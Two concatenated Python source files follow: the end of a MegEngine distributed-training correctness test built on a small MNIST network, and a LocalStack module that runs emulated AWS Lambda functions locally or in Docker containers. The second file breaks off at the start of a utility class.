        for line in cpu_info.split("\n"):
            if "model name" in line:
                # strip the "model name :" prefix of the first matching line
                return re.sub(".*model name.*:", "", line, 1).strip()
    except Exception:
        # Fix: was a bare `except:`; ordinary failures (e.g. no /proc on
        # this platform) fall through to the default return value.
        pass
    return cpu_info
def get_xpu_name():
    """Name of the accelerator in use: the GPU when CUDA is available,
    otherwise the CPU."""
    return get_gpu_name() if mge.is_cuda_available() else get_cpu_name()
class MnistNet(Module):
    """Small LeNet-style MNIST classifier: two conv/pool stages followed by
    two fully connected layers, with optional batch norm after each conv.

    NOTE(review): the fc0 input size 20 * 4 * 4 assumes 28x28 single-channel
    inputs (two 5x5 valid convs + two 2x2 pools) — confirm against the data.
    """

    def __init__(self, has_bn=True):
        super().__init__()
        self.conv0 = Conv2d(1, 20, kernel_size=5, bias=True)
        self.pool0 = AvgPool2d(2)
        self.conv1 = Conv2d(20, 20, kernel_size=5, bias=True)
        self.pool1 = AvgPool2d(2)
        self.fc0 = Linear(20 * 4 * 4, 500, bias=True)
        self.fc1 = Linear(500, 10, bias=True)
        self.bn0 = None
        self.bn1 = None
        if has_bn:
            # batch norm is optional so the same net can be tested without it
            self.bn0 = BatchNorm2d(20)
            self.bn1 = BatchNorm2d(20)

    def forward(self, x):
        x = self.conv0(x)
        if self.bn0:
            x = self.bn0(x)
        x = F.relu(x)
        x = self.pool0(x)
        x = self.conv1(x)
        if self.bn1:
            x = self.bn1(x)
        x = F.relu(x)
        x = self.pool1(x)
        x = F.flatten(x, 1)
        x = self.fc0(x)
        x = F.relu(x)
        x = self.fc1(x)
        # returns raw class logits (no softmax)
        return x
def train(data, label, net, opt, gm):
    """One optimization step: forward, cross-entropy loss, backward, update.

    Returns the scalar loss tensor.
    """
    opt.clear_grad()
    with gm:
        pred = net(data)
        loss = F.nn.cross_entropy(pred, label)
        gm.backward(loss)
    opt.step()
    return loss
def update_model(model_path):
    """
    Update the dumped model with test cases for new reference values.

    The model with pre-trained weights is trained for one iter with the test data attached.
    The loss and updated net state dict is dumped.

    .. code-block:: python

        from test_dp_correctness import update_model
        update_model('mnist_model_with_test.mge') # for gpu
        update_model('mnist_model_with_test_cpu.mge') # for cpu
    """
    net = MnistNet(has_bn=True)
    checkpoint = mge.load(model_path)
    net.load_state_dict(checkpoint["net_init"])
    lr = checkpoint["sgd_lr"]
    opt = SGD(net.parameters(), lr=lr)

    gm = ad.GradManager().attach(
        net.parameters(), callbacks=[dist.make_allreduce_cb("MEAN", dist.WORLD)]
    )

    data = Tensor(checkpoint["data"], dtype=np.float32)
    label = Tensor(checkpoint["label"], dtype=np.int32)

    # Fix: the original called train() without the required `gm` argument
    # (a TypeError), and additionally wrapped it in clear_grad()/step() —
    # train() already clears gradients and applies the optimizer step, so
    # the extra step() would have applied the update twice.
    loss = train(data, label, net=net, opt=opt, gm=gm)

    xpu_name = get_xpu_name()

    checkpoint.update(
        {"net_updated": net.state_dict(), "loss": loss.numpy(), "xpu": xpu_name}
    )
    mge.serialization.save(checkpoint, model_path)
def run_test(
    model_path, use_jit, use_symbolic, sublinear_memory_config=None, max_err=None,
):
    """
    Load the model with test cases and run the training for one iter.

    The loss and updated weights are compared with reference value to verify the correctness.

    Dump a new file with updated result by calling update_model
    if you think the test fails due to numerical rounding errors instead of bugs.
    Please think twice before you do so.

    NOTE(review): use_jit, use_symbolic and sublinear_memory_config are
    currently unused here — confirm whether a traced/jit variant was intended.
    """
    checkpoint = mge.load(model_path)
    data = checkpoint["data"]
    label = checkpoint["label"]

    port = dist.get_free_ports(1)[0]
    # master endpoint the worker processes connect to
    server = dist.Server(port)

    def worker(rank, max_err):
        # One process per rank; gradients are all-reduced with MEAN, so the
        # result should match single-process training on the same data.
        dist.init_process_group("localhost", port, p_num, rank, rank)
        net = MnistNet(has_bn=True)
        net.load_state_dict(checkpoint["net_init"])
        lr = checkpoint["sgd_lr"]
        opt = SGD(net.parameters(), lr=lr)

        gm = ad.GradManager().attach(
            net.parameters(), callbacks=[dist.make_allreduce_cb("MEAN", dist.WORLD)]
        )

        # use same data and label for all gpu's
        # such that the result does not depend on number of gpu
        data_train = Tensor(data)
        label_train = Tensor(label)

        loss = train(data_train, label_train, net, opt, gm)
        np.testing.assert_allclose(loss.numpy(), checkpoint["loss"], atol=max_err)

        # only rank 0 compares the updated weights against the reference
        if dist.get_rank():
            return
        for param, param_ref in zip(
            net.state_dict().items(), checkpoint["net_updated"].items()
        ):
            assert param[0] == param_ref[0]
            np.testing.assert_allclose(param[1], param_ref[1], atol=max_err)

    procs = []
    for rank in range(p_num):
        p = mp.Process(target=worker, args=(rank, max_err,))
        p.start()
        procs.append(p)

    # 20s timeout per worker; a non-zero/None exitcode fails the test
    for p in procs:
        p.join(20)
        assert p.exitcode == 0
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 4, reason="need more gpu device")
@pytest.mark.isolated_distributed
@pytest.mark.skipif(
    platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
def test_dp_correctness():
    """Data-parallel training must reproduce the stored reference values."""
    model_name = "mnist_model_with_test.mge"
    model_path = os.path.join(os.path.dirname(__file__), model_name)
    # reproducible conv algorithm selection so results match the reference
    set_conv_execution_strategy("HEURISTIC_REPRODUCIBLE")
    run_test(model_path, False, False, max_err=1e-5)
|
lambda_executors.py | import os
import re
import glob
import json
import time
import logging
import threading
import subprocess
import six
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file,
to_str, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue, sqs_error_to_dead_letter_queue
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_PYTHON36 = 'python3.6'
LAMBDA_RUNTIME_PYTHON37 = 'python3.7'
LAMBDA_RUNTIME_PYTHON38 = 'python3.8'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS43 = 'nodejs4.3'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_NODEJS810 = 'nodejs8.10'
LAMBDA_RUNTIME_NODEJS10X = 'nodejs10.x'
LAMBDA_RUNTIME_NODEJS12X = 'nodejs12.x'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_RUNTIME_JAVA11 = 'java11'
LAMBDA_RUNTIME_DOTNETCORE2 = 'dotnetcore2.0'
LAMBDA_RUNTIME_DOTNETCORE21 = 'dotnetcore2.1'
LAMBDA_RUNTIME_DOTNETCORE31 = 'dotnetcore3.1'
LAMBDA_RUNTIME_GOLANG = 'go1.x'
LAMBDA_RUNTIME_RUBY = 'ruby'
LAMBDA_RUNTIME_RUBY25 = 'ruby2.5'
LAMBDA_RUNTIME_PROVIDED = 'provided'
LAMBDA_EVENT_FILE = 'event_file.json'
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
EVENT_SOURCE_SQS = 'aws:sqs'
def get_from_event(event, key):
    """Return `key` from the first record of a Lambda event, or None.

    Only KeyError maps to None; an empty 'Records' list still raises
    IndexError, matching the original contract.
    """
    try:
        first_record = event['Records'][0]
        return first_record[key]
    except KeyError:
        return None
def is_java_lambda(lambda_details):
    """True if the runtime (a string, or an object with a .runtime
    attribute) is one of the supported Java runtimes."""
    runtime = getattr(lambda_details, 'runtime', lambda_details)
    return runtime in (LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11)
def is_nodejs_runtime(lambda_details):
    """True if the runtime (a string, or an object with a .runtime
    attribute) is any Node.js runtime."""
    if hasattr(lambda_details, 'runtime'):
        lambda_details = lambda_details.runtime
    return lambda_details.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
    """Persist one invocation's log output to the function's CloudWatch
    log group, under a per-day/per-container stream name."""
    group_name = '/aws/lambda/%s' % func_details.name()
    if not container_id:
        container_id = short_uid()
    if not invocation_time:
        invocation_time = int(time.time() * 1000)
    ts_secs = int(invocation_time / 1000)
    day = time.strftime('%Y/%m/%d', time.gmtime(ts_secs))
    stream_name = '%s/[LATEST]%s' % (day, container_id)
    return store_cloudwatch_logs(group_name, stream_name, log_output, invocation_time)
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
    def __init__(self):
        # keeps track of each function arn and the last time it was invoked
        # (epoch milliseconds), used e.g. for idle-container cleanup
        self.function_invoke_times = {}
    def execute(self, func_arn, func_details, event, context=None, version=None,
            asynchronous=False, callback=None):
        """Run the Lambda either inline (synchronous) or on a background
        thread (asynchronous). Synchronous calls return the handler result;
        asynchronous calls return a (None, message) tuple immediately.
        """
        def do_execute(*args):
            # set the invocation time in milliseconds
            invocation_time = int(time.time() * 1000)
            # start the execution
            raised_error = None
            result = None
            dlq_sent = None
            try:
                result = self._execute(func_arn, func_details, event, context, version)
            except Exception as e:
                raised_error = e
                # On async failure, route the event to the appropriate
                # dead letter queue before re-raising.
                if asynchronous:
                    if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
                        sqs_queue_arn = get_from_event(event, 'eventSourceARN')
                        if sqs_queue_arn:
                            # event source is SQS, send event back to dead letter queue
                            dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
                    else:
                        # event source is not SQS, send back to lambda dead letter queue
                        lambda_error_to_dead_letter_queue(func_details, event, e)
                raise e
            finally:
                # Record the invocation time and notify the callback in both
                # the success and failure paths.
                self.function_invoke_times[func_arn] = invocation_time
                callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
            # return final result
            return result

        # Inform users about asynchronous mode of the lambda execution.
        if asynchronous:
            LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
            FuncThread(do_execute).start()
            return None, 'Lambda executed asynchronously.'

        return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars={}):
process = run(cmd, asynchronous=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE,
env_vars=env_vars, stdin=True)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise Exception('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output))
return result
class ContainerInfo:
    """Plain value object describing a docker container used for a Lambda function."""

    def __init__(self, name, entry_point):
        # docker container name
        self.name = name
        # default entrypoint command of the container image
        self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
    """ Abstract executor class for executing Lambda functions in Docker containers """

    def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
        """ Return the full shell command used to run the Lambda; implemented by subclasses. """
        raise Exception('Not implemented')

    def _docker_cmd(self):
        """ Return the string to be used for running Docker commands. """
        return config.DOCKER_CMD

    def prepare_event(self, environment, event_body):
        """ Return the event as a stdin string. """
        # amend the environment variables for execution
        environment['AWS_LAMBDA_EVENT_BODY'] = event_body
        return None

    def _execute(self, func_arn, func_details, event, context=None, version=None):
        """ Assemble the container environment and command for this invocation, then run it.
        Returns the Lambda result string produced by run_lambda_executor(). """
        lambda_cwd = func_details.cwd
        runtime = func_details.runtime
        handler = func_details.handler
        # copy so per-invocation additions below don't leak into the stored function config
        environment = func_details.envvars.copy()
        # configure USE_SSL in environment
        if config.USE_SSL:
            environment['USE_SSL'] = '1'
        # prepare event body
        if not event:
            LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
            event = {}
        event_body = json.dumps(json_safe(event))
        stdin = self.prepare_event(environment, event_body)
        docker_host = config.DOCKER_HOST_FROM_CONTAINER
        environment['HOSTNAME'] = docker_host
        environment['LOCALSTACK_HOSTNAME'] = docker_host
        environment['_HANDLER'] = handler
        if func_details.timeout:
            environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
        if context:
            environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
            environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
            environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
        # custom command to execute in the container
        command = ''
        # if running a Java Lambda, set up classpath arguments
        if is_java_lambda(runtime):
            java_opts = Util.get_java_opts()
            # Java reads the event from a file instead of stdin (see save_file below)
            stdin = None
            # copy executor jar into temp directory
            target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
            if not os.path.exists(target_file):
                cp_r(LAMBDA_EXECUTOR_JAR, target_file)
            # TODO cleanup once we have custom Java Docker image
            taskdir = '/var/task'
            save_file(os.path.join(lambda_cwd, LAMBDA_EVENT_FILE), event_body)
            classpath = Util.get_java_classpath(target_file)
            command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
                (taskdir, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, LAMBDA_EVENT_FILE))
        # accept any self-signed certificates for outgoing calls from the Lambda
        if is_nodejs_runtime(runtime):
            environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
        # determine the command to be executed (implemented by subclasses)
        cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
        # lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
        LOG.info('Running lambda cmd: %s' % cmd)
        result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
        return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
    """ Executor class for executing Lambda functions in re-usable Docker containers """

    def __init__(self):
        super(LambdaExecutorReuseContainers, self).__init__()
        # locking thread for creation/destruction of docker containers.
        self.docker_container_lock = threading.RLock()
        # On each invocation we try to construct a port unlikely to conflict
        # with a previously invoked lambda function. This is a problem with at
        # least the lambci/lambda:go1.x container, which execs a go program that
        # attempts to bind to the same default port.
        self.next_port = 0
        self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
        self.port_offset = LAMBDA_SERVER_PORT_OFFSET

    def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
        """ Ensure a long-lived container exists for this function, then build a
        "docker cp ...; docker exec ..." shell command that runs the handler in it. """
        # check whether the Lambda has been invoked before
        has_been_invoked_before = func_arn in self.function_invoke_times
        # Choose a port for this invocation
        with self.docker_container_lock:
            env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
            self.next_port = (self.next_port + 1) % self.max_port
        # create/verify the docker container is running.
        LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
        container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
        # Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
        # passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
        # available for docker exec, to better support very large Lambda events (very long environment values)
        # values are passed via shell variable expansion ("$VAR") to avoid quoting issues on the command line
        exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
        if not command:
            command = '%s %s' % (container_info.entry_point, handler)
        # determine files to be copied into the container
        copy_command = ''
        docker_cmd = self._docker_cmd()
        event_file = os.path.join(lambda_cwd, LAMBDA_EVENT_FILE)
        if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
            # if this is the first invocation: copy the entire folder into the container
            copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
        elif os.path.exists(event_file):
            # otherwise, copy only the event file if it exists
            copy_command = '%s cp "%s" "%s:/var/task";' % (docker_cmd, event_file, container_info.name)
        cmd = (
            '%s'
            ' %s exec'
            ' %s'  # env variables
            ' %s'  # container name
            ' %s'  # run cmd
        ) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
        LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
        return cmd

    def startup(self):
        """ Remove any stale containers from previous runs, then start the idle reaper. """
        self.cleanup()
        # start a process to remove idle containers
        if config.LAMBDA_REMOVE_CONTAINERS:
            self.start_idle_container_destroyer_interval()

    def cleanup(self, arn=None):
        """ Destroy the container for one function (arn given) or for all functions. """
        if arn:
            self.function_invoke_times.pop(arn, None)
            return self.destroy_docker_container(arn)
        self.function_invoke_times = {}
        return self.destroy_existing_docker_containers()

    def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
        """
        Prepares a persistent docker container for a specific function.
        :param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
        :param func_arn: The ARN of the lambda function.
        :param env_vars: The environment variables for the lambda.
        :param lambda_cwd: The local directory containing the code for the lambda function.
        :return: ContainerInfo class containing the container name and default entry point.
        """
        with self.docker_container_lock:
            # Get the container name and id.
            container_name = self.get_container_name(func_arn)
            docker_cmd = self._docker_cmd()
            status = self.get_docker_container_status(func_arn)
            LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
            docker_image = Util.docker_image_for_runtime(runtime)
            rm_flag = Util.get_docker_remove_flag()
            # Container is not running or doesn't exist.
            if status < 1:
                # Make sure the container does not exist in any form/state.
                self.destroy_docker_container(func_arn)
                env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
                network = config.LAMBDA_DOCKER_NETWORK
                network_str = '--network="%s"' % network if network else ''
                mount_volume = not config.LAMBDA_REMOTE_DOCKER
                lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
                # detect Windows-style paths (drive letter + backslashes) and rewrite them
                if (':' in lambda_cwd and '\\' in lambda_cwd):
                    lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
                mount_volume_str = '-v "%s":/var/task' % lambda_cwd_on_host if mount_volume else ''
                # Create and start the container
                LOG.debug('Creating container: %s' % container_name)
                cmd = (
                    '%s create'
                    ' %s'  # --rm flag
                    ' --name "%s"'
                    ' --entrypoint /bin/bash'  # Load bash when it starts.
                    ' %s'
                    ' --interactive'  # Keeps the container running bash.
                    ' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
                    ' -e HOSTNAME="$HOSTNAME"'
                    ' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
                    ' %s'  # env_vars
                    ' %s'  # network
                    ' %s'
                ) % (docker_cmd, rm_flag, container_name, mount_volume_str, env_vars_str, network_str, docker_image)
                LOG.debug(cmd)
                run(cmd)
                if not mount_volume:
                    LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
                    cmd = (
                        '%s cp'
                        ' "%s/." "%s:/var/task"'
                    ) % (docker_cmd, lambda_cwd, container_name)
                    LOG.debug(cmd)
                    run(cmd)
                LOG.debug('Starting container: %s' % container_name)
                cmd = '%s start %s' % (docker_cmd, container_name)
                LOG.debug(cmd)
                run(cmd)
                # give the container some time to start up
                time.sleep(1)
            # Get the entry point for the image.
            LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
            cmd = (
                '%s image inspect'
                ' --format="{{ .ContainerConfig.Entrypoint }}"'
                ' %s'
            ) % (docker_cmd, docker_image)
            LOG.debug(cmd)
            run_result = run(cmd)
            # docker prints the entrypoint as "[cmd arg ...]" - strip the brackets/whitespace
            entry_point = run_result.strip('[]\n\r ')
            container_network = self.get_docker_container_network(func_arn)
            LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
                % (entry_point, container_name, container_network))
            return ContainerInfo(container_name, entry_point)

    def destroy_docker_container(self, func_arn):
        """
        Stops and/or removes a docker container for a specific lambda function ARN.
        :param func_arn: The ARN of the lambda function.
        :return: None
        """
        with self.docker_container_lock:
            status = self.get_docker_container_status(func_arn)
            docker_cmd = self._docker_cmd()
            # Get the container name and id.
            container_name = self.get_container_name(func_arn)
            if status == 1:
                LOG.debug('Stopping container: %s' % container_name)
                cmd = (
                    '%s stop -t0 %s'
                ) % (docker_cmd, container_name)
                LOG.debug(cmd)
                run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
                status = self.get_docker_container_status(func_arn)
            if status == -1:
                LOG.debug('Removing container: %s' % container_name)
                cmd = (
                    '%s rm %s'
                ) % (docker_cmd, container_name)
                LOG.debug(cmd)
                run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)

    def get_all_container_names(self):
        """
        Returns a list of container names for lambda containers.
        :return: A String[] localstack docker container names for each function.
        """
        with self.docker_container_lock:
            LOG.debug('Getting all lambda containers names.')
            cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
            LOG.debug(cmd)
            cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
            if len(cmd_result) > 0:
                container_names = cmd_result.split('\n')
            else:
                container_names = []
            return container_names

    def destroy_existing_docker_containers(self):
        """
        Stops and/or removes all lambda docker containers for localstack.
        :return: None
        """
        with self.docker_container_lock:
            container_names = self.get_all_container_names()
            LOG.debug('Removing %d containers.' % len(container_names))
            for container_name in container_names:
                cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
                LOG.debug(cmd)
                run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)

    def get_docker_container_status(self, func_arn):
        """
        Determine the status of a docker container.
        :param func_arn: The ARN of the lambda function.
        :return: 1 If the container is running,
        -1 if the container exists but is not running
        0 if the container does not exist.
        """
        with self.docker_container_lock:
            # Get the container name and id.
            container_name = self.get_container_name(func_arn)
            # Check if the container is already running
            # Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
            # systems. Therefore, we use a combination of filter and grep to get the results.
            cmd = ("docker ps -a --filter name='%s' "
                   '--format "{{ .Status }} - {{ .Names }}" '
                   '| grep -w "%s" | cat') % (container_name, container_name)
            LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
            cmd_result = run(cmd)
            # If the container doesn't exist. Create and start it.
            container_status = cmd_result.strip()
            if len(container_status) == 0:
                return 0
            if container_status.lower().startswith('up '):
                return 1
            return -1

    def get_docker_container_network(self, func_arn):
        """
        Determine the network of a docker container.
        :param func_arn: The ARN of the lambda function.
        :return: name of the container network
        """
        with self.docker_container_lock:
            status = self.get_docker_container_status(func_arn)
            # container does not exist
            if status == 0:
                return ''
            # Get the container name.
            container_name = self.get_container_name(func_arn)
            docker_cmd = self._docker_cmd()
            # Get the container network
            LOG.debug('Getting container network: %s' % container_name)
            cmd = (
                '%s inspect %s'
                ' --format "{{ .HostConfig.NetworkMode }}"'
            ) % (docker_cmd, container_name)
            LOG.debug(cmd)
            cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
            container_network = cmd_result.strip()
            return container_network

    def idle_container_destroyer(self):
        """
        Iterates though all the lambda containers and destroys any container that has
        been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
        :return: None
        """
        LOG.info('Checking if there are idle containers.')
        current_time = int(time.time() * 1000)
        # iterate over a copy, since destroy_docker_container may mutate the dict
        for func_arn, last_run_time in dict(self.function_invoke_times).items():
            duration = current_time - last_run_time
            # not enough idle time has passed
            if duration < MAX_CONTAINER_IDLE_TIME_MS:
                continue
            # container has been idle, destroy it.
            self.destroy_docker_container(func_arn)

    def start_idle_container_destroyer_interval(self):
        """
        Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
        Thus checking for idle containers and destroying them.
        :return: None
        """
        self.idle_container_destroyer()
        threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()

    def get_container_name(self, func_arn):
        """
        Given a function ARN, returns a valid docker container name.
        :param func_arn: The ARN of the lambda function.
        :return: A docker compatible name for the arn.
        """
        return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
    """ Executor class that spins up a fresh (one-shot) Docker container per invocation """

    def __init__(self):
        super(LambdaExecutorSeparateContainers, self).__init__()
        # rolling counter to pick per-invocation API ports when using the host network
        self.next_port = 1
        self.max_port = LAMBDA_API_UNIQUE_PORTS
        self.port_offset = LAMBDA_API_PORT_OFFSET

    def prepare_event(self, environment, event_body):
        # Tell Lambci to use STDIN for the event
        environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
        return event_body.encode()

    def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
        """ Build the shell command that creates and runs a one-shot container for this
        invocation; code is either volume-mounted or copied in (LAMBDA_REMOTE_DOCKER). """
        entrypoint = ''
        if command:
            # a custom command was provided - bypass the image entrypoint
            entrypoint = ' --entrypoint ""'
        else:
            command = '"%s"' % handler
        # add Docker Lambda env vars
        network = config.LAMBDA_DOCKER_NETWORK
        network_str = '--network="%s"' % network if network else ''
        if network == 'host':
            # on the host network, give each invocation its own API/runtime port
            port = str(self.next_port + self.port_offset)
            env_vars['DOCKER_LAMBDA_API_PORT'] = port
            env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = port
            self.next_port = (self.next_port + 1) % self.max_port
        # values are passed via shell variable expansion ("$VAR") to avoid quoting issues
        env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
        debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
        docker_cmd = self._docker_cmd()
        docker_image = Util.docker_image_for_runtime(runtime)
        rm_flag = Util.get_docker_remove_flag()
        if config.LAMBDA_REMOTE_DOCKER:
            # remote docker daemon: create the container, copy the code in, then start it
            cmd = (
                'CONTAINER_ID="$(%s create -i'
                ' %s'  # entrypoint
                ' %s'  # debug_docker_java_port
                ' %s'  # env
                ' %s'  # network
                ' %s'  # --rm flag
                ' %s %s'  # image and command
                ')";'
                '%s cp "%s/." "$CONTAINER_ID:/var/task"; '
                '%s start -ai "$CONTAINER_ID";'
            ) % (docker_cmd, entrypoint, debug_docker_java_port, env_vars_string, network_str, rm_flag,
                 docker_image, command,
                 docker_cmd, lambda_cwd,
                 docker_cmd)
        else:
            # local docker daemon: mount the code folder directly into the container
            lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
            cmd = (
                '%s run -i'
                ' %s -v "%s":/var/task'
                ' %s'
                ' %s'  # network
                ' %s'  # --rm flag
                ' %s %s'
            ) % (docker_cmd, entrypoint, lambda_cwd_on_host, env_vars_string,
                 network_str, rm_flag, docker_image, command)
        return cmd
class LambdaExecutorLocal(LambdaExecutor):
    """ Executor class that runs Lambda functions directly in the local Python process
    (for 'local' executor mode), or via a local `java` command for Java lambdas. """

    def _execute(self, func_arn, func_details, event, context=None, version=None):
        lambda_cwd = func_details.cwd
        environment = func_details.envvars.copy()
        # run the handler and pass the result back via a queue
        queue = Queue()
        lambda_function = func_details.function(version)
        def do_execute():
            # change CWD and ENV before invoking the handler
            # NOTE(review): despite the Process wrapper below, process.run() executes this
            # in the *current* process (Process.start() would fork) - which is why the
            # CaptureOutput context and the in-memory queue work here, but also means the
            # os.chdir/os.environ changes leak into the parent process. Confirm intended.
            if lambda_cwd:
                os.chdir(lambda_cwd)
            if environment:
                os.environ.update(environment)
            result = lambda_function(event, context)
            queue.put(result)
        process = Process(target=do_execute)
        with CaptureOutput() as c:
            process.run()
        result = queue.get()
        # Make sure to keep the log line below, to ensure the log stream gets created
        log_output = 'START: Lambda %s started via "local" executor ...' % func_arn
        # TODO: Interweaving stdout/stderr currently not supported
        for stream in (c.stdout(), c.stderr()):
            if stream:
                log_output += ('\n' if log_output else '') + stream
        # store logs to CloudWatch
        _store_logs(func_details, log_output)
        return result

    def execute_java_lambda(self, event, context, main_file, func_details=None):
        """ Run a Java Lambda locally by shelling out to `java`, passing the event via a temp file. """
        handler = func_details.handler
        opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
        event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
        save_file(event_file, json.dumps(event))
        TMP_FILES.append(event_file)
        # handler format is "com.example.Clazz::method" - only the class name is passed on
        class_name = handler.split('::')[0]
        classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
        cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
        LOG.warning(cmd)
        result = self.run_lambda_executor(cmd, func_details=func_details)
        return result
class Util:
